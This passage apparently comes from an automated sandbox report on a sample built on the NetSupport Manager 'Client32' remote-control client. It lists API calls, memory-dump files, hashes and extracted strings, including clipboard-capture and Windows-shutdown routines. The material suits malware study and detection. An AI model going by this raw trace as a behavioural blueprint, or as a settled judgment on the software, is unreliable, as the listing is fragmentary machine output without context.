                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InformationToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 4114910276-0
                                                                                                              • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                              • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                                              • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                              • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                                                • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 328603210-0
                                                                                                              • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                              • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                                              • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                              • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,6C7B6F16,00000000,?,6C7BD40B,00000001,6C7B6F16,00000000,00000000,00000000,?,6C7B6F16,00000001,00000214), ref: 6C7BA0C5
                                                                                                                • Part of subcall function 6C7B60F9: __getptd_noexit.LIBCMT ref: 6C7B60F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 328603210-0
                                                                                                              • Opcode ID: e94f7fb47d8d378bd73abe145d154534e9907eac8579ac8dec84ef2b8d4c1555
                                                                                                              • Instruction ID: c9cb0e5409b116327906e01f421eb23aa4cb00f9ef25b96ae9ca1c2205eb03d2
                                                                                                              • Opcode Fuzzy Hash: e94f7fb47d8d378bd73abe145d154534e9907eac8579ac8dec84ef2b8d4c1555
                                                                                                              • Instruction Fuzzy Hash: 0B01FC313052169FFB25AE25CE54B5B3768EF813B8F104639ED15E7980EB75E400C650
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __waccess_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 4272103461-0
                                                                                                              • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                              • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                                              • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                              • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __fsopen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3646066109-0
                                                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                              • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                              • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                                              APIs
                                                                                                              • _NSMClient32@8.PCICL32(?,?,?,002210A2,00000000), ref: 0022100B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4178437972.0000000000221000.00000020.00000001.01000000.00000009.sdmp, Offset: 00220000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4178412002.0000000000220000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_220000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Client32@8
                                                                                                              • String ID:
                                                                                                              • API String ID: 433899448-0
                                                                                                              • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                              • Instruction ID: 480e7dfc328688d80b7511861094ef4acdf82f13b4a183f8d9f34bbc1b545af3
                                                                                                              • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                              • Instruction Fuzzy Hash: DCB092B212434DAB8714EE99E841C7B339CAAA8600B000809BE0543282CA65FC709A71
                                                                                                              APIs
                                                                                                              • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                                                • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                                                • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                                                • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                                                • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                                                • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                                                • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                                              • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                                              • SetEvent.KERNEL32(0000025C), ref: 1102D3E7
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                                              • PostThreadMessageA.USER32(00001E5C,00000000,00000000,00000000), ref: 1102D5BC
                                                                                                              • CloseHandle.KERNEL32(00000290), ref: 1102D815
                                                                                                              • _free.LIBCMT ref: 1102D825
                                                                                                              • _free.LIBCMT ref: 1102D841
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                                              • _memset.LIBCMT ref: 1102D983
                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                                              • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                                              • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                                              • String ID: *.*$927537$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                                              • API String ID: 2369127096-2105217470
                                                                                                              • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                              • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                                              • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                              • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                                              APIs
                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                                                • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                              • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                                              • _sprintf.LIBCMT ref: 1103B2BB
                                                                                                              • _fputs.LIBCMT ref: 1103B330
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                                              • _free.LIBCMT ref: 1103B336
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                                                • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                                              • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                              • API String ID: 383231468-3762817415
                                                                                                              • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                              • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                                              • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                              • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                              • API String ID: 0-293745777
                                                                                                              • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                              • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                                              • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                              • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                                              • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                                                • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                                                • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                                                • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                                • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                                                • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                                • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                                • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                                                • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                                • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                                                • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                              • String ID: NSMClassList$NSMFindClassEvent
                                                                                                              • API String ID: 1622498684-2883797795
                                                                                                              • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                              • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                                              • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                              • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                                              APIs
                                                                                                                • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                              • _memset.LIBCMT ref: 1115B266
                                                                                                              • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
